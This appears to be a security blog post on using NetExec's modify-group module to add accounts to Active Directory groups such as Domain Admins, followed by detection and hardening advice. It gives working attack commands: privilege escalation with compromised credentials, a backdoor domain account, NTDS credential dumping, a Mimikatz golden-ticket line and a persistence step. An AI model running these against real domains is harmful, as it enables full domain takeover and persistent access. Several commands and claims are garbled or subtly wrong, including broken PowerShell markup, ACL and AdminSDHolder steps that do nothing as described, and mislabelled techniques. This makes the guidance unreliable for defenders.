Listen to this Post
Introduction:
NetExec (formerly CrackMapExec) is a post‑exploitation tool widely used by penetration testers and red teams to interact with Active Directory (AD) environments. Its newly introduced `modify‑group` module allows an attacker who has obtained valid credentials with sufficient privileges to add or remove users from any AD group – including highly sensitive ones like Domain Admins – using either the SMB or LDAP protocol. This capability dramatically simplifies privilege escalation paths and highlights the critical importance of monitoring group membership changes in enterprise Windows networks.
Learning Objectives:
- Understand how to use NetExec’s `modify‑group` module to add/remove AD group members via SMB and LDAP.
- Identify detection opportunities and mitigation strategies for unauthorized group modifications.
- Execute post‑exploitation commands on Linux and Windows to enumerate groups, verify memberships, and harden Active Directory.
You Should Know:
1. Installing NetExec and Enumerating Group Permissions
NetExec is a Python‑based tool that runs on Linux (Kali, Parrot, or any distribution with Python ≥3.8). Before adding users to groups, you must identify which groups you can modify with your compromised credentials.
Step‑by‑step installation and permission enumeration:
Install NetExec from GitHub (recommended for latest features) sudo apt update && sudo apt install python3 pipx git pipx ensurepath git clone https://github.com/Pennyw0rth/NetExec cd NetExec pipx install . Alternatively, use pip pipx install git+https://github.com/Pennyw0rth/NetExec Verify installation nxc --version
Enumerate current user’s group memberships and privileges:
Using SMB – list all groups the user belongs to nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' --groups Using LDAP – more detailed attribute retrieval nxc ldap 192.168.1.10 -u compromised_user -p 'P@ssw0rd' --kdcHost 192.168.1.10 -M get-desc-users
Check which groups you have write/modify permissions on (requires PowerView or BloodHound for full ACL analysis). A quick manual test for the target group:
Attempt to add a dummy user to a test group first nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M modify-group -o action=add group="TestGroup" user=dummy
If the command succeeds without access errors, you have sufficient permissions.
- Adding a User to a Privileged Group via SMB
Once you confirm write access to a target group (e.g., Domain Admins, Enterprise Admins, or Backup Operators), you can elevate your current user or add a new backdoor account.
Step‑by‑step privilege escalation with SMB:
Add your compromised user to Domain Admins nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M modify-group -o action=add group="Domain Admins" user=compromised_user Add a new attacker‑controlled user nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M modify-group -o action=add group="Domain Admins" user=attacker_backdoor Verify the group membership change nxc smb 192.168.1.10 -u attacker_backdoor -p 'NewPass123' --groups
Understanding the module parameters:
– `action=add` or `action=remove`
– `group=
– `user=
– Works over SMB only if the authenticated user has `WriteProperty` or `AddMember` delegation rights on the group object.
Alternative using LDAP (often more reliable in large domains):
nxc ldap 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M modify-group -o action=add group="Domain Admins" user=compromised_user
The LDAP method uses the directory’s native modify operations and may bypass certain SMB‑focused monitoring.
3. Detecting & Mitigating Unauthorized Group Modifications
Defenders must monitor for `modify-group` activity using Windows Event Logs and proper security configurations. Here are key detection commands and hardening steps.
On a Windows Domain Controller – detect group changes via Event Viewer:
- Event ID 4728: A member was added to a security‑enabled global group.
- Event ID 4729: A member was removed from a security‑enabled global group.
- Event ID 4756: A member added to a universal group.
- Event ID 4732: A member added to a local group.
PowerShell commands to monitor recent group modifications:
Query Security log for group member additions in the last 24 hours
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4728,4732,4756; StartTime=(Get-Date).AddDays(-1)} |
Select-Object TimeCreated, @{Name='User';Expression={$<em>.Properties[bash].Value}},
@{Name='Group';Expression={$</em>.Properties[bash].Value}},
@{Name='Member';Expression={$_.Properties[bash].Value}}
Export group memberships to a baseline (run daily)
Get-ADGroupMember -Identity "Domain Admins" | Export-Csv -Path "C:\Audit\domain_admins_baseline.csv"
Mitigation actions – restrict who can modify privileged groups:
From a Domain Admin elevated PowerShell session Remove unnecessary ACLs on the Domain Admins group $group = Get-ADGroup "Domain Admins" $acl = Get-ACL "AD:\$($group.DistinguishedName)" Remove write permissions from non‑protected accounts Set-ACL -AclObject $acl -Path "AD:\$($group.DistinguishedName)" Enable AdminSDHolder protection (prevents inheritance changes) Set-ADObject -Identity "CN=AdminSDHolder,CN=System,DC=domain,DC=com" -ProtectedFromAccidentalDeletion $true
- Full Attack Chain: From Group Membership to Domain Compromise
After adding yourself to a high‑privilege group, you can perform several post‑exploitation actions to fully compromise the domain.
Step‑by‑step exploitation sequence:
- Update your Kerberos ticket (required for newly added groups to reflect):
On Windows attacker machine (as newly elevated user) klist purge runas /netonly /user:domain\compromised_user cmd.exe
2. Dump domain credentials using DCSync:
Using NetExec with DCSync (need Domain Replication rights) nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' --ntds vss
- Create a Golden Ticket (using Mimikatz on Windows or ticketer on Linux):
On Windows with administrator privileges mimikatz.exe "lsadump::dcsync /user:krbtgt" "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt" "exit"
4. Persist through Scheduled Tasks:
Using NetExec’s sc_manager module nxc smb 192.168.1.10 -u compromised_user -p 'P@ssw0rd' -M sc_manager -o action=create name=Backdoor binpath="C:\Windows\System32\cmd.exe /c net user backdoor Pass123 /add /domain"
5. Defensive Hardening Commands for Active Directory
System administrators should implement the following measures to block NetExec’s `modify-group` module.
On Windows Domain Controllers and member servers:
Enforce minimum permission for group modifications – remove generic write ACLs
List all groups with non‑owner write access
Get-ADGroup -Filter | ForEach-Object {
$acl = Get-ACL "AD:\$($<em>.DistinguishedName)"
$acl.Access | Where-Object { $</em>.ActiveDirectoryRights -match "WriteProperty" -and
$_.IdentityReference -notin @("NT AUTHORITY\SYSTEM","DOMAIN\Domain Admins") }
}
Enable advanced audit policies for group management
auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
Block SMB group modification via Group Policy (prevent NetExec SMB method)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RestrictNullSessAccess" -Value 1 -Type DWORD
On Linux (jump host / management server) – restrict NetExec installations and monitor for its use:
Detect NetExec usage by scanning process lists ps aux | grep -E 'nxc|crackmapexec' Restrict execution via AppArmor or SELinux (example for Ubuntu) sudo aa-genprof /usr/local/bin/nxc Follow prompts to create a strict profile
What Undercode Say:
- Key Takeaway 1: NetExec’s `modify‑group` module transforms a “low‑privilege” user with delegated group write rights into a domain administrator within minutes – emphasizing that ACL misconfigurations are as dangerous as credential theft.
- Key Takeaway 2: Defenders must move beyond simple password hygiene and implement real‑time monitoring of Event IDs 4728, 4732, and 4756, combined with strict delegation models (e.g., tiered administration and PAM solutions).
The `modify-group` feature highlights a recurring theme in AD security: privileges often flow through group memberships, and any account that can alter those memberships holds the keys to the kingdom. While penetration testers gain an efficient new primitive, blue teams now have a clear attack signature to hunt – abrupt additions to sensitive groups, especially over SMB or LDAP from unexpected workstations. The most effective mitigation remains the principle of least privilege combined with regular ACL reviews using tools like BloodHound or PurpleKnight. Organizations still relying on “Domain Admins” for routine administrative work are especially vulnerable. Automating alerting on group changes and requiring secondary approval (e.g., via JIT access solutions) can neuter this attack entirely.
Prediction:
As NetExec continues to evolve, expect to see this group‑modification capability weaponized in ransomware intrusions where attackers first add a buggy account to Backup Operators or Domain Admins to disable recovery options. Microsoft will likely respond by introducing more granular Protected Users group controls or marking LDAP group modification requests as high‑risk events in Identity Protection. Meanwhile, the open‑source community will build detection scripts that parse NetExec’s specific user‑agent strings and module command lines, forcing attackers to shift to less convenient methods (e.g., direct PowerShell or Cobalt Strike lateral movement). Ultimately, the convenience of `modify-group` for red teams will mirror its danger in the wild – making group membership hardening a top priority for 2026.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Josecampo Nxc – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
